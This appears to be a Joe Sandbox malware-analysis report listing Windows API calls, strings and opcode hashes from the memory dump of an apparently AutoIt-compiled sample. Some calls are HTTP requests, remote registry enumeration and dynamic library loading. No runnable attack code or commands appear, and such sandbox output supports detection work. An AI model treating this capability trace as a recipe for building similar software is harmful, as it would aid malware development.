                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 395418827c6e8d8e1f65cb8675b80fb3b314c956360d741b9056a9dd86533ab1
                                                                                                                • Instruction ID: b8980ead674f2b06679194f71182f0b2e23f0cbe0d2b04c547c1e6cf553ea9fd
                                                                                                                • Opcode Fuzzy Hash: 395418827c6e8d8e1f65cb8675b80fb3b314c956360d741b9056a9dd86533ab1
                                                                                                                • Instruction Fuzzy Hash: C8F0BE36058602EBD7111B64FDACEDA7729FF45302B010239F213900A0CBF61800DF50
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0093899D
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 009389A9
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009389B2
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009389BA
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009389C3
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009389CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 0feb07a67ac69ee8d6cb92d99c2cbd1cf542a136f70942418caae46d144f5dc6
                                                                                                                • Instruction ID: 0e7e3ba3f65b4f57a5c46f2415f3702b3d56d65d6a905b151baa19af0c8e814c
                                                                                                                • Opcode Fuzzy Hash: 0feb07a67ac69ee8d6cb92d99c2cbd1cf542a136f70942418caae46d144f5dc6
                                                                                                                • Instruction Fuzzy Hash: CFE0C23601C401FBDA011FE1FC1CD0ABB69FB8A3A2B118238F21981170CBB29420EB50
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00958613
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00958722
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0095889A
                                                                                                                  • Part of subcall function 00947562: VariantInit.OLEAUT32(00000000), ref: 009475A2
                                                                                                                  • Part of subcall function 00947562: VariantCopy.OLEAUT32(00000000,?), ref: 009475AB
                                                                                                                  • Part of subcall function 00947562: VariantClear.OLEAUT32(00000000), ref: 009475B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: d4b42f9060201e616b4cbeb761130a7e24fbd346035aca3d130c789e0abf5b7f
                                                                                                                • Instruction ID: f909b4ddd5b5f7955d796c0e650227db688635b782442435035425adc1e37d4d
                                                                                                                • Opcode Fuzzy Hash: d4b42f9060201e616b4cbeb761130a7e24fbd346035aca3d130c789e0abf5b7f
                                                                                                                • Instruction Fuzzy Hash: E1915A716083419FC710DF2AC48495BBBE8FF89715F14492DF99A9B361DB30E909CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                • _memset.LIBCMT ref: 00942B87
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00942BB6
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00942C69
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00942C97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: a1d4538d2cb87ac4530c8b0d7b77eccaf52141d853f0c9d449e0fa678dead7a6
                                                                                                                • Instruction ID: b4452c1cf77d42ebdb325a00e7441139b6ea7a89d2a195b2076e4dae058c0bf8
                                                                                                                • Opcode Fuzzy Hash: a1d4538d2cb87ac4530c8b0d7b77eccaf52141d853f0c9d449e0fa678dead7a6
                                                                                                                • Instruction Fuzzy Hash: DC51B9716083009ED7249F28D885B6FB7E8FF8A311F540A6DF895D72D1DB64CC449BA2
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093D5D4
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0093D60A
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0093D61B
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0093D69D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: 4c81e747df828ad15017750e98c6827b7997597ff73fddd0c645232a543df4ac
                                                                                                                • Instruction ID: e2eb58466c84abcb35d3ecfb3706c7b7b88b9bd5872a66b97376b8275514220e
                                                                                                                • Opcode Fuzzy Hash: 4c81e747df828ad15017750e98c6827b7997597ff73fddd0c645232a543df4ac
                                                                                                                • Instruction Fuzzy Hash: 93418DB1601204EFDB15CF64E895A9ABBA9EF85318F1580ADFC099F205D7B1DE44CFA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 009427C0
                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009427DC
                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00942822
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009A5890,00000000), ref: 0094286B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: 443b76b2842a21fd1102a1b22513a5dc96aee937ae749c9501c2890bc8412f0a
                                                                                                                • Instruction ID: 59e3213a97e113afd1093913d71637cfb34541c13cd9f2fc213eca537d15c69e
                                                                                                                • Opcode Fuzzy Hash: 443b76b2842a21fd1102a1b22513a5dc96aee937ae749c9501c2890bc8412f0a
                                                                                                                • Instruction Fuzzy Hash: FD418D702083419FD724DF24D844F2ABBE8FF85314F54496DF9A697392DB70A905CB52
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0095D7C5
                                                                                                                  • Part of subcall function 008E784B: _memmove.LIBCMT ref: 008E7899
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower_memmove
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 3425801089-567219261
                                                                                                                • Opcode ID: b8681d3fc0ef46eefc62f95d36e1dc3b338c2ffd5e65eea880024e5a4325ba07
                                                                                                                • Instruction ID: baec78e35627d924e889cfe60c5fabc1852a3ebd9fb9e9faba25551fb478192a
                                                                                                                • Opcode Fuzzy Hash: b8681d3fc0ef46eefc62f95d36e1dc3b338c2ffd5e65eea880024e5a4325ba07
                                                                                                                • Instruction Fuzzy Hash: 1331D271A04619AFCF10EF99CC51AEEB7B4FF55320F008629E826976D1DB31AD09CB80
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00938F14
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00938F27
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00938F57
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_memmove$ClassName
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 365058703-1403004172
                                                                                                                • Opcode ID: 4d98a899ad0d100a63268960546fbe424b28b7cc8e9efc005771eb204f27bf60
                                                                                                                • Instruction ID: 2ad9d858171434e323fac803b46ea703bebdb2303314713d28a13f63866c6687
                                                                                                                • Opcode Fuzzy Hash: 4d98a899ad0d100a63268960546fbe424b28b7cc8e9efc005771eb204f27bf60
                                                                                                                • Instruction Fuzzy Hash: 3C214671A04208BEDB14ABB5DC85DFFB769EF82320F044519F421971E1CF380D0ADA60
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095184C
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00951872
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009518A2
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 009518E9
                                                                                                                  • Part of subcall function 00952483: GetLastError.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 00952498
                                                                                                                  • Part of subcall function 00952483: SetEvent.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 009524AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                • Opcode ID: 8883eecb1caa4b07c194cc1e018cb0c31c5c6fc4c5f3eff1a2146af606230d14
                                                                                                                • Instruction ID: 2f3d8afa1fd7c949d2a78fb4e07e2f56c5616a0b69bc1093588e25997a0ff357
                                                                                                                • Opcode Fuzzy Hash: 8883eecb1caa4b07c194cc1e018cb0c31c5c6fc4c5f3eff1a2146af606230d14
                                                                                                                • Instruction Fuzzy Hash: 3421C2B5504308BFEB21DF62DC85FBF77EDEB89746F10412AF90596240DB648D0867A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008E1D73
                                                                                                                  • Part of subcall function 008E1D35: GetStockObject.GDI32(00000011), ref: 008E1D87
                                                                                                                  • Part of subcall function 008E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E1D91
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00966461
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00966468
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0096647D
                                                                                                                • DestroyWindow.USER32(?), ref: 00966485
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: b4eecec29f615ef55f2b05f660feeabbbf119c6b516d0dbc97492b67a48d6775
                                                                                                                • Instruction ID: e529dc521282fa7738434fbe638a2aa3f54adef46c595f9be08e67dd8076336a
                                                                                                                • Opcode Fuzzy Hash: b4eecec29f615ef55f2b05f660feeabbbf119c6b516d0dbc97492b67a48d6775
                                                                                                                • Instruction Fuzzy Hash: 6721C071214205BFEF104F68EC94EBB77ADEF593A8F104629FA10931A0DB71DC41A760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00946DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00946DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00946E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00946E3B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 5ea8a7c6e4c940966cd07f39e31de32caf31a80972554ecaf21f3490a5c18f16
• Instruction ID: dbed9d4279d6988066244aa28fa2ac776b2897be82f5151395b8b05944d21668
• Opcode Fuzzy Hash: 5ea8a7c6e4c940966cd07f39e31de32caf31a80972554ecaf21f3490a5c18f16
• Instruction Fuzzy Hash: 6B2195F5A00209ABDB209F29DC45F9A7BF8EF86720F204A19FDA0D72D0D77099509B52
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00946E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00946EBB
• GetStdHandle.KERNEL32(000000F6), ref: 00946ECC
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00946F06
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: b1c244336e1a26e203530b600349dafc12b4753964fd46c6ea352d540f4e9684
• Instruction ID: 633e5407f517498143887db9bd2189aacb457ab2520e46b470fee5837e7e0c1b
• Opcode Fuzzy Hash: b1c244336e1a26e203530b600349dafc12b4753964fd46c6ea352d540f4e9684
• Instruction Fuzzy Hash: C72190B96003059BDB209F69DC44EAB77E8EF47720F200A19F9E1D72D0E770A8648B52
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0094AC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0094ACA8
• __swprintf.LIBCMT ref: 0094ACC1
• SetErrorMode.KERNEL32(00000000,00000001,00000000,0096F910), ref: 0094ACFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: d92dcf3c782abed1cb375372d690181228aee7f3695a1e11c4290a084c32c23a
• Instruction ID: 9e7056e658b29369146133a366c07232b58eebfaea2e75fe97c69d149c5efc27
• Opcode Fuzzy Hash: d92dcf3c782abed1cb375372d690181228aee7f3695a1e11c4290a084c32c23a
• Instruction Fuzzy Hash: B8218330A00109AFCB10DF69D985EEE7BB8FF8A314B004079F909DB251DB71EA41DB21
APIs
• CharUpperBuffW.USER32(?,?), ref: 00941B19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: c16039bd22dd53a737e79a3f7db64e4b2a1f2266971fc28612f7fef5824611a7
• Instruction ID: a5e95fb53b4b72ae2e3b30df38f338177acf0dd1dd9c92d1554a066f278c38e5
• Opcode Fuzzy Hash: c16039bd22dd53a737e79a3f7db64e4b2a1f2266971fc28612f7fef5824611a7
• Instruction Fuzzy Hash: 09116130910249CFCF00EFA8D855AFEB7B4FF66304F1044A9E815A7696EB329D0ACB51
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0095EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0095EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0095ED6A
• CloseHandle.KERNEL32(?), ref: 0095EDEB
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: 15d2a67de5a50b797269df43fcde02ff23eee5efaf0c623cb91afd87ad0a4b7f
• Instruction ID: 8dfb5ebf5df96e11d6aa968427566a4af6bdc79a31cfbe733a328287554e9de6
• Opcode Fuzzy Hash: 15d2a67de5a50b797269df43fcde02ff23eee5efaf0c623cb91afd87ad0a4b7f
• Instruction Fuzzy Hash: 75817F71604310AFD764EF2AC846F2AB7E5FF45710F04882DF999DB2D2D6B1AD448B42
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009600FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00960183
• RegCloseKey.ADVAPI32(?,?), ref: 009601AF
• RegCloseKey.ADVAPI32(00000000), ref: 009601BC
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: b33ffa8b565d2d5950ebf1cccd2cef37bbb1375693ad954cb1a07dd223d5fb4b
• Instruction ID: 6a891d2e8bc193e6ac598eb0fe0a666c312bece8c7a2aaa8fa85ee56d2e63d9f
• Opcode Fuzzy Hash: b33ffa8b565d2d5950ebf1cccd2cef37bbb1375693ad954cb1a07dd223d5fb4b
• Instruction Fuzzy Hash: BD515B71208244AFD704EF58D881F6BB7E9FF85314F40892DF596872A2DB71E904DB52
APIs
  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0095D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0095D9AA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0095D9C6
